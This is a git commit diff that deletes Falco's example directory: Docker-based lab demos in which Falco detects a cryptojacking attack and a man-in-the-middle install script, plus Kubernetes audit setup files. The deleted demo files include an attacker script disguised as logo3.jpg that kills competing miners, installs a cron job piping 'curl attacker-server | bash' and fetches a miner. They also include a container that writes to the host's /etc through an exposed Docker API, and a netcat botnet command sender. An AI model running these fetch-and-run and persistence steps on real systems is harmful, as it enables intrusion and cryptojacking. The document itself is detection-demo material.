update(examples): move /examples to contrib repo

Signed-off-by: Leonardo Grasso <me@leonardograsso.com>
Leonardo Grasso 2020-05-06 14:55:50 +02:00 committed by poiana
parent ede2ef8706
commit 9242c45214
29 changed files with 0 additions and 1114 deletions

View File

@ -1,2 +0,0 @@
labels:
- area/examples

View File

@ -1,117 +0,0 @@
# Demo of Falco Detecting Cryptomining Exploit
## Introduction
Based on a [blog post](https://sysdig.com/blog/detecting-cryptojacking/) we wrote, this example shows how an overly permissive container environment can be exploited to install cryptomining software and how use of the exploit can be detected using Falco.
Although the exploit in the blog post involved modifying the cron configuration on the host filesystem, in this example we keep the host filesystem untouched. Instead, we have a container play the role of the "host", and set up everything using [docker-compose](https://docs.docker.com/compose/) and [docker-in-docker](https://hub.docker.com/_/docker/).
## Requirements
In order to run this example, you need Docker Engine >= 1.13.0 and docker-compose >= 1.10.0, as well as curl.
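If you want to double-check your tooling first, something like the following should work (a sketch; exact flags and output formats vary by version):
```
docker version --format 'Docker Engine: {{.Server.Version}}'
docker-compose version --short
curl --version | head -n1
```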
## Example architecture
The example consists of the following:
* `host-machine`: A docker-in-docker instance that plays the role of the host machine. It runs a cron daemon and an independent copy of the docker daemon that listens on port 2375. This port is exposed to the world, and this port is what the attacker will use to install new software on the host.
* `attacker-server`: An nginx instance that serves the malicious files and scripts used by the attacker.
* `falco`: A Falco instance to detect the suspicious activity. It connects to the docker daemon on `host-machine` to fetch container information.
All of the above are configured in the docker-compose file [demo.yml](./demo.yml).
A separate container is created to launch the attack:
* `docker123321-mysql`: An [alpine](https://hub.docker.com/_/alpine/) container that mounts /etc from `host-machine` into /mnt/etc within the container. The JSON container description is in the file [docker123321-mysql-container.json](./docker123321-mysql-container.json).
## Example Walkthrough
### Start everything using docker-compose
To make sure you're starting from scratch, first run `docker-compose -f demo.yml down -v` to remove any existing containers, volumes, etc.
Then run `docker-compose -f demo.yml up --build` to create the `host-machine`, `attacker-server`, and `falco` containers.
You will see fairly verbose output from dockerd:
```
host-machine_1 | crond: crond (busybox 1.27.2) started, log level 6
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="starting containerd" module=containerd revision=9b55aab90508bd389d7654c4baf173a981477d55 version=v1.0.1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.content.v1.content"..." module=containerd type=io.containerd.content.v1
host-machine_1 | time="2018-03-15T15:59:51Z" level=info msg="loading plugin "io.containerd.snapshotter.v1.btrfs"..." module=containerd type=io.containerd.snapshotter.v1
```
When you see log output like the following, you know that falco is started and ready:
```
falco_1 | Wed Mar 14 22:37:12 2018: Falco initialized with configuration file /etc/falco/falco.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.yaml
falco_1 | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco/falco_rules.local.yaml
```
### Launch malicious container
To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you could do the same with `docker -H localhost:2375 run ...`).
The script `launch_malicious_container.sh` performs the necessary POSTs:
* `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
* `http://localhost:2375/containers/create?&name=docker123321-mysql`
* `http://localhost:2375/containers/docker123321-mysql/start`
Run the script via `bash launch_malicious_container.sh`.
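For reference, a roughly equivalent launch using the docker CLI against the exposed daemon would look like the sketch below (it mirrors the container description in [docker123321-mysql-container.json](./docker123321-mysql-container.json); the demo itself uses the raw API):
```
docker -H localhost:2375 pull alpine:latest
docker -H localhost:2375 run -d --name docker123321-mysql -v /etc:/mnt/etc alpine:latest \
  /bin/sh -c "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"
```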
### Examine cron output as malicious software is installed & run
`docker123321-mysql` writes the following line to `/mnt/etc/crontabs/root`, which corresponds to `/etc/crontabs/root` on the host:
```
* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
```
It also touches the file `/mnt/etc/crontabs/cron.update`, which corresponds to `/etc/crontabs/cron.update` on the host, to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg)) from `attacker-server` and run it.
You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H localhost:2375 ps`. You should see output like the following:
```
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
68ed578bd034 alpine:latest "/bin/sh -c 'echo '*…" About a minute ago Up About a minute docker123321-mysql
```
Once the cron job runs, you will see output like the following:
```
host-machine_1 | crond: USER root pid 187 cmd curl -s http://attacker-server:8220/logo3.jpg | bash -s
host-machine_1 | ***Checking for existing Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /logo3.jpg HTTP/1.1" 200 1963 "-" "curl/7.58.0" "-"
host-machine_1 | ***Killing competing Miner programs
host-machine_1 | ***Reinstalling cron job to run Miner program
host-machine_1 | ***Configuring Miner program
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /config_1.json HTTP/1.1" 200 50 "-" "curl/7.58.0" "-"
attacker-server_1 | 172.22.0.4 - - [14/Mar/2018:22:38:00 +0000] "GET /minerd HTTP/1.1" 200 87 "-" "curl/7.58.0" "-"
host-machine_1 | ***Configuring system for Miner program
host-machine_1 | vm.nr_hugepages = 9
host-machine_1 | ***Running Miner program
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
host-machine_1 | ***Ensuring Miner program is alive
host-machine_1 | 238 root 0:00 {jaav} /bin/bash ./jaav -c config.json -t 3
host-machine_1 | /var/tmp
host-machine_1 | runing.....
```
### Observe Falco detecting malicious activity
To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
```
falco_1 | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
falco_1 | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
```
### Cleanup
To tear down the environment, stop `docker-compose` with Ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.

View File

@ -1,14 +0,0 @@
server {
    listen 8220;
    server_name localhost;
    location / {
        root /usr/share/nginx/html;
        index index.html index.htm;
    }
    error_page 500 502 503 504 /50x.html;
    location = /50x.html {
        root /usr/share/nginx/html;
    }
}

View File

@ -1 +0,0 @@
{"config": "some-bitcoin-miner-config-goes-here"}

View File

@ -1,64 +0,0 @@
#!/bin/sh
echo "***Checking for existing Miner program"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
    pwd
else
    echo "***Killing competing Miner programs"
    rm -rf /var/tmp/ysjswirmrm.conf
    rm -rf /var/tmp/sshd
    ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9
    ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9
    ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9
    ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9
    ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9
    ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9
    echo "***Reinstalling cron job to run Miner program"
    crontab -r || true && \
    echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
    crontab /tmp/cron || true && \
    rm -rf /tmp/cron || true
    echo "***Configuring Miner program"
    curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
    curl -so /var/tmp/jaav http://attacker-server:8220/minerd
    chmod 777 /var/tmp/jaav
    cd /var/tmp
    echo "***Configuring system for Miner program"
    cd /var/tmp
    proc=`grep -c ^processor /proc/cpuinfo`
    cores=$(($proc+1))
    num=$(($cores*3))
    /sbin/sysctl -w vm.nr_hugepages=$num
    echo "***Running Miner program"
    nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "***Ensuring Miner program is alive"
ps -fe|grep jaav |grep -v grep
if [ $? -eq 0 ]
then
    pwd
else
    echo "***Reconfiguring Miner program"
    curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
    curl -so /var/tmp/jaav http://attacker-server:8220/minerd
    chmod 777 /var/tmp/jaav
    cd /var/tmp
    echo "***Reconfiguring system for Miner program"
    proc=`grep -c ^processor /proc/cpuinfo`
    cores=$(($proc+1))
    num=$(($cores*3))
    /sbin/sysctl -w vm.nr_hugepages=$num
    echo "***Restarting Miner program"
    nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
fi
echo "runing....."

View File

@ -1,7 +0,0 @@
#!/bin/bash
while true; do
    echo "Mining bitcoins..."
    sleep 60
done

View File

@ -1,41 +0,0 @@
version: '3'
volumes:
  host-filesystem:
  docker-socket:
services:
  host-machine:
    privileged: true
    build:
      context: ${PWD}/host-machine
      dockerfile: ${PWD}/host-machine/Dockerfile
    volumes:
      - host-filesystem:/etc
      - docker-socket:/var/run
    ports:
      - "2375:2375"
    depends_on:
      - "falco"
  attacker-server:
    image: nginx:latest
    ports:
      - "8220:8220"
    volumes:
      - ${PWD}/attacker_files:/usr/share/nginx/html
      - ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf
    depends_on:
      - "falco"
  falco:
    image: falcosecurity/falco:latest
    privileged: true
    volumes:
      - docker-socket:/host/var/run
      - /dev:/host/dev
      - /proc:/host/proc:ro
      - /boot:/host/boot:ro
      - /lib/modules:/host/lib/modules:ro
      - /usr:/host/usr:ro
    tty: true

View File

@ -1,7 +0,0 @@
{
  "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
  "Image": "alpine:latest",
  "HostConfig": {
    "Binds": ["/etc:/mnt/etc"]
  }
}

View File

@ -1,12 +0,0 @@
FROM docker:stable-dind
RUN set -ex \
    && apk add --no-cache \
        bash curl
COPY start-cron-and-dind.sh /usr/local/bin
ENTRYPOINT ["start-cron-and-dind.sh"]
CMD []

View File

@ -1,11 +0,0 @@
#!/bin/sh
# Start docker-in-docker, but backgrounded with its output still going
# to stdout/stderr.
dockerd-entrypoint.sh &
# Start cron in the foreground with a moderate level of debugging to
# see job output.
crond -f -d 6

View File

@ -1,14 +0,0 @@
#!/bin/sh
echo "Pulling alpine:latest image to docker-in-docker instance"
curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
echo "Creating container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
echo "Running container mounting /etc from host-machine"
curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'

View File

@ -1,136 +0,0 @@
This page describes how to get [Kubernetes Auditing](https://kubernetes.io/docs/tasks/debug-application-cluster/audit) working with Falco.
It covers either static audit backends in Kubernetes 1.11, or dynamic sinks in Kubernetes 1.13, which configure webhook backends through an AuditSink API object.
<!-- toc -->
- [Instructions for Kubernetes 1.11](#instructions-for-kubernetes-111)
  * [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster)
  * [Define your audit policy and webhook configuration](#define-your-audit-policy-and-webhook-configuration)
  * [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging)
  * [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco)
- [Instructions for Kubernetes 1.13](#instructions-for-kubernetes-113)
  * [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster-1)
  * [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging-1)
  * [Deploy AuditSink objects](#deploy-auditsink-objects)
  * [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco-1)
- [Instructions for Kubernetes 1.13 with dynamic webhook and local log file](#instructions-for-kubernetes-113-with-dynamic-webhook-and-local-log-file)
<!-- tocstop -->
## Instructions for Kubernetes 1.11
The main steps are:
1. Deploy Falco to your Kubernetes cluster
1. Define your audit policy and webhook configuration
1. Restart the API Server to enable Audit Logging
1. Observe Kubernetes audit events at falco
### Deploy Falco to your Kubernetes cluster
Follow the [Falco documentation website](https://falco.org/docs/installation/). You can also find useful resources for creating a service account, service, configmap, and daemonset in the [contrib](https://github.com/falcosecurity/contrib) repo.
### Define your audit policy and webhook configuration
The files in this directory can be used to configure Kubernetes audit logging. The relevant files are:
* [audit-policy.yaml](./audit-policy.yaml): The Kubernetes audit log configuration we used to create the rules in [k8s_audit_rules.yaml](../../rules/k8s_audit_rules.yaml).
* [webhook-config.yaml.in](./webhook-config.yaml.in): A (templated) webhook configuration that sends audit events to the IP associated with the falco service, on port 8765. It is templated in that the *actual* IP is defined in an environment variable `FALCO_SERVICE_CLUSTERIP`, which can be plugged in using a program like `envsubst`.
Run the following to fill in the template file with the `ClusterIP` address of the `falco-service` service you created above. Although names like `falco-service.default.svc.cluster.local` cannot be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the `ClusterIP`s associated with those services are routable.
```
FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < webhook-config.yaml.in > webhook-config.yaml
```
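As a quick sanity check (not part of the original walkthrough), you can confirm that the placeholder was actually substituted:
```
grep FALCO_SERVICE_CLUSTERIP webhook-config.yaml || echo "ClusterIP substituted correctly"
```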
### Restart the API Server to enable Audit Logging
A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps to enable audit log support for the apiserver: it copies the audit policy/webhook files to the apiserver machine and modifies the apiserver command line to add arguments such as `--audit-log-path` and `--audit-policy-file`. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
It is run as `bash ./enable-k8s-audit.sh <variant> static`. `<variant>` can be one of the following:
* `minikube`
* `kops`
When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops static`
Its output looks like this:
```
$ bash enable-k8s-audit.sh minikube static
***Copying apiserver config patch script to apiserver...
apiserver-config.patch.sh 100% 1190 1.2MB/s 00:00
***Copying audit policy/webhook files to apiserver...
audit-policy.yaml 100% 2519 1.2MB/s 00:00
webhook-config.yaml 100% 248 362.0KB/s 00:00
***Modifying k8s apiserver config (will result in apiserver restarting)...
***Done!
$
```
### Observe Kubernetes audit events at falco
Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
## Instructions for Kubernetes 1.13
The main steps are:
1. Deploy Falco to your Kubernetes cluster
2. Restart the API Server to enable Audit Logging
3. Deploy the AuditSink object for your audit policy and webhook configuration
4. Observe Kubernetes audit events at falco
### Deploy Falco to your Kubernetes cluster
Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a Falco service account, service, configmap, and daemonset.
### Restart the API Server to enable Audit Logging
A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps to enable dynamic audit support for the apiserver: it modifies the apiserver command line to add arguments such as `--audit-dynamic-configuration` and `--feature-gates=DynamicAuditing=true`. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
It is run as `bash ./enable-k8s-audit.sh <variant> dynamic`. `<variant>` can be one of the following:
* `minikube`
* `kops`
When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops dynamic`
Its output looks like this:
```
$ bash enable-k8s-audit.sh minikube dynamic
***Copying apiserver config patch script to apiserver...
apiserver-config.patch.sh 100% 1190 1.2MB/s 00:00
***Modifying k8s apiserver config (will result in apiserver restarting)...
***Done!
$
```
### Deploy AuditSink objects
[audit-sink.yaml.in](./audit-sink.yaml.in), in this directory, is a template audit sink configuration that defines the dynamic audit policy and webhook to route Kubernetes audit events to Falco.
Run the following to fill in the template file with the `ClusterIP` address of the `falco-service` service you created above. Although names like `falco-service.default.svc.cluster.local` cannot be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the ClusterIPs associated with those services are routable.
```
FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < audit-sink.yaml.in > audit-sink.yaml
```
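Then create the `AuditSink` object from the generated file (a sketch; assumes your kubectl context points at the cluster configured above):
```
kubectl apply -f audit-sink.yaml
```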
### Observe Kubernetes audit events at falco
Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
## Instructions for Kubernetes 1.13 with dynamic webhook and local log file
If you want to use a mix of `AuditSink` for remote audit events as well as a local audit log file, you can run `enable-k8s-audit.sh` with the `"dynamic+log"` argument e.g. `bash ./enable-k8s-audit.sh <variant> dynamic+log`. This will enable dynamic audit logs as well as a static audit log to a local file. Its output looks like this:
```
***Copying apiserver config patch script to apiserver...
apiserver-config.patch.sh 100% 2211 662.9KB/s 00:00
***Copying audit policy file to apiserver...
audit-policy.yaml 100% 2519 847.7KB/s 00:00
***Modifying k8s apiserver config (will result in apiserver restarting)...
***Done!
```
The audit log will be available on the apiserver host at `/var/lib/k8s_audit/audit.log`.
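To follow it, you can tail the file over SSH (a sketch assuming the `minikube` variant and the same connection details used by `enable-k8s-audit.sh`):
```
ssh -i "$(minikube ssh-key)" docker@"$(minikube ip)" "sudo tail -f /var/lib/k8s_audit/audit.log"
```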

View File

@ -1,72 +0,0 @@
#!/usr/bin/env bash
set -euo pipefail
IFS=''
FILENAME=${1:-/etc/kubernetes/manifests/kube-apiserver.yaml}
VARIANT=${2:-minikube}
AUDIT_TYPE=${3:-static}
if [ "$AUDIT_TYPE" == "static" ]; then
    if grep audit-webhook-config-file "$FILENAME" ; then
        echo audit-webhook patch already applied
        exit 0
    fi
else
    if grep audit-dynamic-configuration "$FILENAME" ; then
        echo audit-dynamic-configuration patch already applied
        exit 0
    fi
fi
TMPFILE="/tmp/kube-apiserver.yaml.patched"
rm -f "$TMPFILE"
APISERVER_PREFIX=" -"
APISERVER_LINE="- kube-apiserver"
if [ "$VARIANT" == "kops" ]; then
    APISERVER_PREFIX=" "
    APISERVER_LINE="/usr/local/bin/kube-apiserver"
fi
while read -r LINE
do
    echo "$LINE" >> "$TMPFILE"
    case "$LINE" in
        *$APISERVER_LINE*)
            if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
                echo "$APISERVER_PREFIX --audit-log-path=/var/lib/k8s_audit/audit.log" >> "$TMPFILE"
                echo "$APISERVER_PREFIX --audit-policy-file=/var/lib/k8s_audit/audit-policy.yaml" >> "$TMPFILE"
                if [[ $AUDIT_TYPE == "static" ]]; then
                    echo "$APISERVER_PREFIX --audit-webhook-config-file=/var/lib/k8s_audit/webhook-config.yaml" >> "$TMPFILE"
                    echo "$APISERVER_PREFIX --audit-webhook-batch-max-wait=5s" >> "$TMPFILE"
                fi
            fi
            if [[ ($AUDIT_TYPE == "dynamic" || $AUDIT_TYPE == "dynamic+log") ]]; then
                echo "$APISERVER_PREFIX --audit-dynamic-configuration" >> "$TMPFILE"
                echo "$APISERVER_PREFIX --feature-gates=DynamicAuditing=true" >> "$TMPFILE"
                echo "$APISERVER_PREFIX --runtime-config=auditregistration.k8s.io/v1alpha1=true" >> "$TMPFILE"
            fi
            ;;
        *"volumeMounts:"*)
            if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
                echo " - mountPath: /var/lib/k8s_audit/" >> "$TMPFILE"
                echo " name: data" >> "$TMPFILE"
            fi
            ;;
        *"volumes:"*)
            if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
                echo " - hostPath:" >> "$TMPFILE"
                echo " path: /var/lib/k8s_audit" >> "$TMPFILE"
                echo " name: data" >> "$TMPFILE"
            fi
            ;;
    esac
done < "$FILENAME"
cp "$FILENAME" "/tmp/kube-apiserver.yaml.original"
cp "$TMPFILE" "$FILENAME"

View File

@ -1,82 +0,0 @@
apiVersion: audit.k8s.io/v1beta1 # This is required.
kind: Policy
# Don't generate audit events for all requests in RequestReceived stage.
omitStages:
  - "RequestReceived"
rules:
  # Log pod changes at RequestResponse level
  - level: RequestResponse
    resources:
    - group: ""
      # Resource "pods" doesn't match requests to any subresource of pods,
      # which is consistent with the RBAC policy.
      resources: ["pods", "deployments"]
  - level: RequestResponse
    resources:
    - group: "rbac.authorization.k8s.io"
      # Resource "pods" doesn't match requests to any subresource of pods,
      # which is consistent with the RBAC policy.
      resources: ["clusterroles", "clusterrolebindings"]
  # Log "pods/log", "pods/status" at Metadata level
  - level: Metadata
    resources:
    - group: ""
      resources: ["pods/log", "pods/status"]
  # Don't log requests to a configmap called "controller-leader"
  - level: None
    resources:
    - group: ""
      resources: ["configmaps"]
      resourceNames: ["controller-leader"]
  # Don't log watch requests by the "system:kube-proxy" on endpoints or services
  - level: None
    users: ["system:kube-proxy"]
    verbs: ["watch"]
    resources:
    - group: "" # core API group
      resources: ["endpoints", "services"]
  # Don't log authenticated requests to certain non-resource URL paths.
  - level: None
    userGroups: ["system:authenticated"]
    nonResourceURLs:
    - "/api*" # Wildcard matching.
    - "/version"
  # Log the request body of configmap changes in kube-system.
  - level: Request
    resources:
    - group: "" # core API group
      resources: ["configmaps"]
    # This rule only applies to resources in the "kube-system" namespace.
    # The empty string "" can be used to select non-namespaced resources.
    namespaces: ["kube-system"]
  # Log configmap changes in all other namespaces at the RequestResponse level.
  - level: RequestResponse
    resources:
    - group: "" # core API group
      resources: ["configmaps"]
  # Log secret changes in all other namespaces at the Metadata level.
  - level: Metadata
    resources:
    - group: "" # core API group
      resources: ["secrets"]
  # Log all other resources in core and extensions at the Request level.
  - level: Request
    resources:
    - group: "" # core API group
    - group: "extensions" # Version of group should NOT be included.
  # A catch-all rule to log all other requests at the Metadata level.
  - level: Metadata
    # Long-running requests like watches that fall under this rule will not
    # generate an audit event in RequestReceived.
    omitStages:
      - "RequestReceived"

View File

@ -1,16 +0,0 @@
apiVersion: auditregistration.k8s.io/v1alpha1
kind: AuditSink
metadata:
  name: falco-audit-sink
spec:
  policy:
    level: RequestResponse
    stages:
    - ResponseComplete
    - ResponseStarted
  webhook:
    throttle:
      qps: 10
      burst: 15
    clientConfig:
      url: "http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit"

View File

@ -1,46 +0,0 @@
#!/usr/bin/env bash
set -euo pipefail
VARIANT=${1:-minikube}
AUDIT_TYPE=${2:-static}
if [ "$VARIANT" == "minikube" ]; then
    APISERVER_HOST=$(minikube ip)
    SSH_KEY=$(minikube ssh-key)
    SSH_USER="docker"
    MANIFEST="/etc/kubernetes/manifests/kube-apiserver.yaml"
fi
if [ "$VARIANT" == "kops" ]; then
    # APISERVER_HOST=api.your-kops-cluster-name.com
    SSH_KEY=~/.ssh/id_rsa
    SSH_USER="admin"
    MANIFEST=/etc/kubernetes/manifests/kube-apiserver.manifest
    if [ -z "${APISERVER_HOST+xxx}" ]; then
        echo "***You must specify APISERVER_HOST with the name of your kops api server"
        exit 1
    fi
fi
echo "***Copying apiserver config patch script to apiserver..."
ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo mkdir -p /var/lib/k8s_audit && sudo chown $SSH_USER /var/lib/k8s_audit"
scp -i $SSH_KEY apiserver-config.patch.sh "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
if [ "$AUDIT_TYPE" == "static" ]; then
    echo "***Copying audit policy/webhook files to apiserver..."
    scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
    scp -i $SSH_KEY webhook-config.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
fi
if [ "$AUDIT_TYPE" == "dynamic+log" ]; then
    echo "***Copying audit policy file to apiserver..."
    scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
fi
echo "***Modifying k8s apiserver config (will result in apiserver restarting)..."
ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo bash /var/lib/k8s_audit/apiserver-config.patch.sh $MANIFEST $VARIANT $AUDIT_TYPE"
echo "***Done!"

View File

@ -1,14 +0,0 @@
apiVersion: v1
kind: Config
clusters:
- name: falco
  cluster:
    server: http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit
contexts:
- context:
    cluster: falco
    user: ""
  name: default-context
current-context: default-context
preferences: {}
users: []

View File

@ -1,78 +0,0 @@
# Demo of falco with man-in-the-middle attacks on installation scripts
For context, see the corresponding [blog post](http://sysdig.com/blog/making-curl-to-bash-safer) for this demo.
## Demo architecture
### Initial setup
Make sure no prior `botnet_client.py` processes are lying around.
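One way to check for, and clean up, any leftover clients (a sketch):
```
pgrep -af botnet_client.py
pkill -f botnet_client.py
```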
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* apache: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
* nginx: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
* evil_apache: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
* attacker_botnet_master: constantly trying to contact the botnet_client.py process.
* falco: will detect the activities of botnet_client.py.
### Download `install-software.sh`, see botnet client running
Run the following to fetch and execute the installation script,
which also installs the botnet client:
```
$ curl http://localhost/install-software.sh | bash
```
You'll see messages about installing the software. (The script doesn't actually install anything; the messages are just for demonstration purposes.)
Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
```
$ ps auxww | grep python
...
root 19983 0.1 0.4 33992 8832 pts/1 S 13:34 0:00 python ./botnet_client.py
$ telnet localhost 1234
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
```
You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
```
attacker_botnet_master | Trying to contact compromised machine...
attacker_botnet_master | Waiting for botnet command and control commands...
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
```
At this point, kill the botnet_client.py process to clean things up.
### Run installation script again using `fbash`, note falco warnings.
If you run the installation script again, this time piping it to `fbash`:
```
curl http://localhost/install-software.sh | ./fbash
```
In the docker-compose output, you'll see the following falco warnings:
```
falco | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
```

View File

@ -1,7 +0,0 @@
#!/bin/sh
while true; do
    echo "Trying to contact compromised machine..."
    echo "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec" | nc localhost 1234 && echo "**********Contacted compromised machine, sent botnet commands"
    sleep 5
done

View File

@ -1,51 +0,0 @@
# Owned by software vendor, serving install-software.sh.
apache:
  container_name: apache
  image: httpd:2.4
  volumes:
    - ${PWD}/web_root:/usr/local/apache2/htdocs
# Owned by software vendor, compromised by attacker.
nginx:
  container_name: mitm_nginx
  image: nginx:latest
  links:
    - apache
  ports:
    - "80:80"
  volumes:
    - ${PWD}/nginx.conf:/etc/nginx/nginx.conf:ro
# Owned by attacker.
evil_apache:
  container_name: evil_apache
  image: httpd:2.4
  volumes:
    - ${PWD}/evil_web_root:/usr/local/apache2/htdocs
  ports:
    - "9090:80"
# Owned by attacker, constantly trying to contact client.
attacker_botnet_master:
  container_name: attacker_botnet_master
  image: alpine:latest
  net: host
  volumes:
    - ${PWD}/botnet_master.sh:/tmp/botnet_master.sh
  command:
    - /tmp/botnet_master.sh
# Owned by client, detects attack by attacker
falco:
  container_name: falco
  image: falcosecurity/falco:latest
  privileged: true
  volumes:
    - /var/run/docker.sock:/host/var/run/docker.sock
    - /dev:/host/dev
    - /proc:/host/proc:ro
    - /boot:/host/boot:ro
    - /lib/modules:/host/lib/modules:ro
    - /usr:/host/usr:ro
    - ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
  tty: true

View File

@ -1,18 +0,0 @@
import socket;
import signal;
import os;
os.close(0);
os.close(1);
os.close(2);
